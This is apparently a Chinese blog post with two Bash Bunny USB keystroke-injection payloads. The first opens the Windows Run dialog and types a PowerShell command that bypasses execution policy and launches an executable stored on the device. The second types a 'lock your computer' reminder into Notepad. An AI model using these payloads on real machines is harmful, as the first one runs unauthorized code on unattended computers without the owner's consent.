HID STORAGE模式识别为u盘
Q STRING后面的字符串不能很长,如果需要,声明字符串变量即可。
以下示例针对中文输入法。
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED ATTACK
# Run the run.ps1 script in the BashBunny
powershell="Powershell -nop -ex Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\tst.exe')"
#RUN WIN Powershell -nop -ex Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\tst.exe')"
Q GUI r
Q DELAY 150
Q SHIFT
Q DELAY 150
Q STRING $powershell
Q ENTER
LED G 0
HID模式识别为人体工程学设备
LED B G 100
msg_header="begining"
msg_body="I will learn to lock my computer"
msg_body_repeats=10
msg_end="Please remember to lock your computer when you walk away."
ATTACKMODE HID
Q GUI r
Q DELAY 150
Q STRING notepad.exe
Q ENTER
LED B 500
Q DELAY 200
Q STRING $msg_header
Q ENTER
for (( i=1; i<=$msg_body_repeats; i++ ))
do
Q STRING $msg_body
Q ENTER
done
Q STRING $msg_end
Q ENTER
LED G 0
网友评论